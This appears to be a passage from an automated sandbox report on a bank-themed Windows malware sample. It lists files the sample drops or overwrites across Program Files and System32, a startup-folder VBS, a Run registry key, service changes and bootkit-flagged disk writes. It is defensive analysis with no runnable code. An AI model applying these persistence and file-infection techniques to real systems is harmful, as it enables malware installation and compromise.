Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Mozilla Firefox\plugin-container.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe	Jump to behavior

Drops PE files

Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\servertool.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Mozilla Firefox\pingsender.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXE	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	File created: C:\Users\user\AppData\Local\differences\niellist.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	File created: C:\Windows\System32\Locator.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Mozilla Firefox\default-browser-agent.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Google\GoogleUpdater\135.0.7023.0\updater.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\filecompare.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\7-Zip\7z.exe	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	File created: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	File created: C:\Windows\System32\AppVClient.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\7-Zip\7zG.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	File created: C:\Windows\SysWOW64\perfhost.exe	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	File created: C:\Windows\System32\msiexec.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\keytool.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Google\Chrome\Application\134.0.6998.36\elevation_service.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Google\Chrome\Application\134.0.6998.36\os_update_handler.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File created: C:\Users\user\AppData\Local\Temp\build.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Mozilla Firefox\maintenanceservice.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Mozilla Firefox\firefox.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Mozilla Firefox\updater.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\kinit.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\AutoIt3\Au3Check.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\policytool.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.ShowHelp.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\7-Zip\Uninstall.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	File created: C:\Windows\System32\FXSSVC.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	File created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\rmiregistry.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft Office\root\Integration\Addons\OneDriveSetup.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft Office\root\Office16\CLVIEW.EXE	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	File created: C:\Windows\System32\SensorDataService.exe	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	File created: C:\Windows\System32\msdtc.exe	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	File created: C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Google\Chrome\Application\134.0.6998.36\Installer\setup.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\pack200.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	File created: C:\Windows\System32\alg.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File created: C:\Users\user\AppData\Local\Temp\XClient.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\rmid.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\7-Zip\7zFM.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\klist.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	File created: C:\Users\user\AppData\Roaming\XClient.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\tnameserv.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft Office\root\Integration\Integrator.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft Office\root\Office16\GRAPH.EXE	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Google\Chrome\Application\134.0.6998.36\Installer\chrmstp.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft Office\root\Office16\CNFNOT32.EXE	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft Office\root\Office16\excelcnv.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Mozilla Firefox\private_browsing.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Google\Chrome\Application\134.0.6998.36\notification_helper.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\AutoIt3\Au3Info.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft Office\root\Office16\AppSharingHookController.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	File created: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\orbd.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Google\Chrome\Application\134.0.6998.36\chrome_pwa_launcher.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Google\Chrome\Application\134.0.6998.36\elevated_tracing_service.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\ktab.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Mozilla Firefox\plugin-container.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe	Jump to dropped file

Drops PE files to the windows directory (C:\Windows)

Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	File created: C:\Windows\System32\Locator.exe	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	File created: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	File created: C:\Windows\System32\AppVClient.exe	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	File created: C:\Windows\System32\FXSSVC.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	File created: C:\Windows\System32\alg.exe	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	File created: C:\Windows\SysWOW64\perfhost.exe	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	File created: C:\Windows\System32\msiexec.exe	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	File created: C:\Windows\System32\SensorDataService.exe	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	File created: C:\Windows\System32\msdtc.exe	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	File created: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe	Jump to dropped file

Boot Survival

Drops VBS files to the startup folder

Source: C:\Users\user\AppData\Local\differences\niellist.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\niellist.vbs

Jump to dropped file

Creates a start menu entry (Start Menu\Programs\Startup)

Source: C:\Users\user\AppData\Local\differences\niellist.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\niellist.vbs

Jump to behavior

Stores files to the Windows start menu directory

Source: C:\Users\user\AppData\Local\differences\niellist.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\niellist.vbs

Jump to behavior

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe

Code function: 0_2_00AFCBD0 StrStrIW,CloseHandle,StrStrIW,CloseServiceHandle,OpenServiceW,StrStrIW,_wcslen,ChangeServiceConfigW,StrStrIW,StrStrIW,CloseServiceHandle,CloseHandle,StartServiceW,

0_2_00AFCBD0

Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run XClient
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run XClient

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1

Writes data at the end of the disk (often used by bootkits to hide malicious code)

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	File written: C:\Users\user\AppData\Roaming\a8259331cca430bb.bin offset: 0	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe offset: 0	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe offset: 162304	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe offset: 735820	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe offset: 0	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe offset: 737280	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe offset: 1285120	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe offset: 0	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe offset: 1286144	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe offset: 1289427	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe offset: 0	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe offset: 0	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe offset: 735744	Jump to behavior
